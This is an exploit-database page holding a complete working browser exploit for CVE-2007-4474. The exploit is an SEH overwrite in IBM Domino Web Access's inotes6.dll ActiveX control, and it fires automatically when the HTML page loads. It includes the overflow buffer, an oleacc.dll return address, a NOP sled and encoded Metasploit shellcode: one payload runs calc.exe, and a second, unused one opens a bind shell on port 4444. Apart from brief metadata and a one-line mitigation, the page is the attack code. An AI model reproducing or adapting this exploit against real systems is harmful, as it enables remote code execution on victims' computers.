header-logo
Suggest Exploit
vendor:
Domino Web Access
by:
e.b.
7.5
CVSS
HIGH
SEH Overwrite Exploit
SEH Overwrite Exploit
CWE
Product Name: Domino Web Access
Affected Version From: 6.0.40.0
Affected Version To: 6.0.48.0
Patch Exists: NO
Related CWE: CVE-2007-4474
CPE: cpe:2.3:a:ibm:domino_web_access:6.0.40.0:*:*:*:*:*:*:*
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP2 (fully patched) English
2007

IBM Domino Web Access Upload Module inotes6.dll SEH Overwrite Exploit

This exploit takes advantage of a vulnerability in the IBM Domino Web Access Upload Module inotes6.dll. It allows an attacker to overwrite the Structured Exception Handler (SEH) and execute arbitrary code. The exploit has been tested on Windows XP SP2 with IE6 and inotes6.dll versions 6.0.40.0 and 6.0.48.0. The shellcode used in this exploit executes the 'calc.exe' command.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of IBM Domino Web Access that addresses this issue.
Source

Exploit-DB raw data:

<!-- 
written by e.b. 
IBM Domino Web Access Upload Module inotes6.dll SEH Overwrite Exploit
Bad chars: 0x80+
CVE-2007-4474
Tested on Windows XP SP2(fully patched) English, IE6, inotes6.dll version 6.0.40.0 and version 6.0.48.0
Thanks to str0ke for pointing me in the right direction and to h.d.m. and the Metasploit crew 
-->
<html>
 <head>
  <title>IBM Domino Web Access Upload Module inotes6.dll SEH Overwrite Exploit</title>
  <script language="JavaScript" defer>
    function Check() {
     
     var buf = 'A'; 
     while (buf.length <= 3119) buf = buf + 'A';


// win32_exec -  EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com 
var shellcode1 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +
                          "%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" +
                          "%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" +
                          "%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" +
                          "%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" +
                          "%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" +
                          "%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" +
                          "%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" +
                          "%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" +
                          "%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" +
                          "%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" +
                          "%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" +
                          "%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" +
                          "%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" +
                          "%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" +
                          "%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" +
                          "%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" +
                          "%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" +
                          "%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" +
                          "%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" +
                          "%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" +
                          "%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" +
                          "%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" +
                          "%4e%31%75%74%38%70%65%77%70%43");

// win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com 
var shellcode2 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +
                          "%49%49%49%49%49%49%49%49%49%49%37%49%51%5a%6a%43" +
                          "%58%30%42%31%50%41%42%6b%41%41%53%41%32%41%41%32" +
                          "%42%41%30%42%41%58%50%38%41%42%75%78%69%4b%4c%72" +
                          "%4a%58%6b%52%6d%4a%48%4a%59%6b%4f%6b%4f%69%6f%41" +
                          "%70%4e%6b%52%4c%74%64%41%34%6e%6b%37%35%55%6c%4c" +
                          "%4b%71%6c%64%45%61%68%74%41%6a%4f%6e%6b%62%6f%32" +
                          "%38%6c%4b%33%6f%37%50%55%51%78%6b%31%59%6c%4b%50" +
                          "%34%6e%6b%46%61%68%6e%45%61%6f%30%6c%59%6c%6c%6b" +
                          "%34%39%50%41%64%37%77%68%41%69%5a%56%6d%63%31%4b" +
                          "%72%78%6b%6c%34%75%6b%56%34%31%34%57%58%54%35%6b" +
                          "%55%6e%6b%33%6f%55%74%74%41%78%6b%41%76%4c%4b%46" +
                          "%6c%62%6b%6e%6b%41%4f%35%4c%56%61%68%6b%66%63%36" +
                          "%4c%6c%4b%6b%39%72%4c%44%64%57%6c%61%71%4f%33%47" +
                          "%41%6b%6b%33%54%4c%4b%63%73%70%30%6c%4b%53%70%64" +
                          "%4c%6c%4b%72%50%45%4c%4e%4d%6c%4b%37%30%75%58%73" +
                          "%6e%42%48%4c%4e%52%6e%46%6e%58%6c%56%30%39%6f%58" +
                          "%56%71%76%46%33%72%46%63%58%30%33%70%32%33%58%54" +
                          "%37%52%53%45%62%51%4f%50%54%4b%4f%5a%70%33%58%6a" +
                          "%6b%68%6d%59%6c%45%6b%46%30%49%6f%59%46%73%6f%4e" +
                          "%69%58%65%73%56%4d%51%58%6d%36%68%64%42%72%75%72" +
                          "%4a%67%72%59%6f%6e%30%72%48%4a%79%56%69%6b%45%6e" +
                          "%4d%76%37%6b%4f%58%56%33%63%30%53%50%53%76%33%70" +
                          "%53%33%73%53%63%37%33%56%33%6b%4f%5a%70%32%46%50" +
                          "%68%35%41%71%4c%30%66%33%63%6c%49%6d%31%6a%35%70" +
                          "%68%6e%44%35%4a%52%50%4b%77%71%47%4b%4f%4e%36%30" +
                          "%6a%52%30%31%41%70%55%59%6f%6e%30%30%68%6c%64%4c" +
                          "%6d%54%6e%79%79%31%47%59%6f%59%46%46%33%66%35%6b" +
                          "%4f%58%50%63%58%4b%55%73%79%4c%46%41%59%63%67%4b" +
                          "%4f%78%56%76%30%53%64%41%44%33%65%79%6f%4e%30%4e" +
                          "%73%71%78%58%67%61%69%69%56%71%69%62%77%39%6f%6a" +
                          "%76%51%45%49%6f%4e%30%51%76%53%5a%71%74%72%46%62" +
                          "%48%30%63%30%6d%6c%49%5a%45%63%5a%62%70%76%39%31" +
                          "%39%58%4c%4e%69%4d%37%53%5a%33%74%4e%69%4b%52%56" +
                          "%51%4b%70%6c%33%6f%5a%49%6e%33%72%44%6d%6b%4e%37" +
                          "%32%76%4c%6e%73%6c%4d%70%7a%76%58%6c%6b%4e%4b%4c" +
                          "%6b%73%58%53%42%79%6e%6d%63%74%56%6b%4f%30%75%70" +
                          "%44%4b%4f%79%46%53%6b%70%57%70%52%71%41%50%51%42" +
                          "%71%41%7a%33%31%42%71%41%41%51%45%66%31%69%6f%5a" +
                          "%70%50%68%6e%4d%5a%79%56%65%68%4e%33%63%39%6f%58" +
                          "%56%63%5a%4b%4f%4b%4f%70%37%4b%4f%4a%70%4c%4b%61" +
                          "%47%6b%4c%4d%53%6b%74%31%74%49%6f%59%46%70%52%59" +
                          "%6f%4e%30%63%58%6c%30%6f%7a%57%74%61%4f%32%73%4b" +
                          "%4f%68%56%39%6f%38%50%43");


		var next_seh_pointer = unescape("%EB%06%90%90"); //2 byte jump
		
		//oleacc.dll Windows XP SP2 English 0x74C96950 pop ebp - pop - retbis
                //no SafeSEH
		var seh_handler = unescape("%50%69%C9%74"); 
	
		var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90");

		var m = buf + next_seh_pointer + seh_handler + nop + shellcode1 + nop;
		
		obj.General_ServerName = m;
                obj.InstallBrowserHelperDll();

   } 
   
   </script>
  </head>
 <body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:3BFFE033-BF43-11D5-A271-00A024A51325">
     Unable to create object
    </object>
 </body>
</html>

# milw0rm.com [2007-12-30]

Navigation

Suggest Exploit

Services By CQR